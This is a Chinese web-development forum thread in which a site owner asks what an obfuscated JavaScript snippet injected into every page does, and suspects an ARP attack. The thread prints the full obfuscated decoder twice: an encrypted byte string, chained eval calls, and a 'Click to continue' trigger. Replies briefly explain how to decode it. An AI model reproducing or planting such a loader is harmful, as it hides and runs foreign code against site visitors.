求一段js是做什么的

cyr11 2013-12-01 10:46:15
<script>
var cq = "/index.php?c=code&id=12&ic",
dq = "yrbj3",
gq, eq = new Array(),
fq = "\xb7\xfb\xb1%\x0e=W\x8c\xe1\xe6\xf70A\x0bM\xd4\xa6\xeb@\xa8\x8bw\xd3\xf1-T\xc7\x11\x86\x8d\x1f]\xe9S\xa6\x13\x22\xab*7y\xcd\xd1\x99\x9eV]\xe1\x95\xfa\xf9\xe9";
function aq(bq) {
for (gq = 0; gq < fq.length; gq++) eq[gq] = fq.charCodeAt(gq);
gq = 3;
for (;; gq++) {
if (gq > 50) break;
eq[gq] = (eq[gq] + eq[gq + 1]) & 0xff;
eq[gq] = (eq[gq] >> 4) | ((eq[gq] << 4) & 0xff);
}
gq = "gq=50;do{eq[gq]=(eq[gq]-eq[gq-1])&0xff;eq[gq]=(eq
[gq]>>3)|((eq[gq]<<5)&0xff);}while(--gq>=4);";
eval(gq);
gq = "gq=2;while
(gq<=47){eq[gq]=(-(((eq[gq]^60)>>7)|(((eq[gq]^60)<<1)&0xff)))&0xff;gq
++;}";

eval(gq);
fq = "";
for (gq = 1; gq < eq.length - 1; gq++) if (gq % 8) fq += String.fromCharCode(eq[gq] ^ bq);

eval("gq=eval;gq(fq);");
}
</script>


每个页面都加载这个js,估计apr攻击!
不知道是什么意思!求高手解释一下这个js是做什么的!
...全文
173 4 打赏 收藏 转发到动态 举报
写回复
用AI写文章
4 条回复
切换为时间正序
请发表友善的回复…
发表回复
cyr11 2013-12-03
  • 打赏
  • 举报
回复
我知道点击一下就可以看到 http://i.tianqi.com/index.php?c=code&id=12&ic 但我想知道他apr最终是想要干什么!难道是让我点击一下才看到内容吗
cyr11 2013-12-03
  • 打赏
  • 举报
回复
我发完成代码出来!大家看看告诉我这个apr到底是要做什么
<html><body><script>var ku="http://i.tianqi.com/index.php?c=code&id=12&ic",lu="zisr",ou,mu=new Array(),nu="\xdblr\x0f\x06\xd3\xff\xa1?\xac9x=2Jn\xa3\xe0\xfe\xd1PF\xa1\xb7\x86$W\x190F\x0c\x80\xdf\xeb~H 0H\x14b\xd3\xb8\x84I\xf7\xa3\x22E\xc4\xe5\xfe#\xd4\x0b\xb0\xc02\x82";function iu(ju){for(ou=0;ou<nu.length;ou++)mu[ou]=nu.charCodeAt(ou);ou=3;for(;;){if(ou>54)break;mu[ou]=(mu[ou]-mu[ou+1])&0xff;mu[ou]=(((mu[ou]+168)&0xff)>>6)|((((mu[ou]+168)&0xff)<<2)&0xff);ou++;}ou="ou=55;do{if(ou<3)break;mu[ou]=(mu[ou]+mu[ou-1])&0xff;ou--;}while(true);";eval(ou);ou="ou=3;for(;ou<=55;){mu[ou]=(((mu[ou]+mu[ou+1])&0xff)>>2)|((((mu[ou]+mu[ou+1])&0xff)<<6)&0xff);mu[ou]=(mu[ou]-230)&0xff;ou++;}";eval(ou);nu="";for(ou=1;ou<mu.length-1;ou++)if(ou%7)nu+=String.fromCharCode(mu[ou]^ju);eval("ou=eval");ou(nu);}</script><br><br><br><center><h3><a href="#" onclick="iu(27)"><p>Click to continue</p></a></h3></center></body></html>
天际的海浪 2013-12-02
  • 打赏
  • 举报
回复
应该是对加密的代码字符串进行解密的,由于代码不完整,无法得出解密的结果,没有aq()函数调用的部分
ftiger 2013-12-01
  • 打赏
  • 举报
回复
alert(fq); //eval("gq=eval;gq(fq);"); 关键就是eval了fq,fq加密了,不过自带解密,直接alert就出来了。

87,922

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧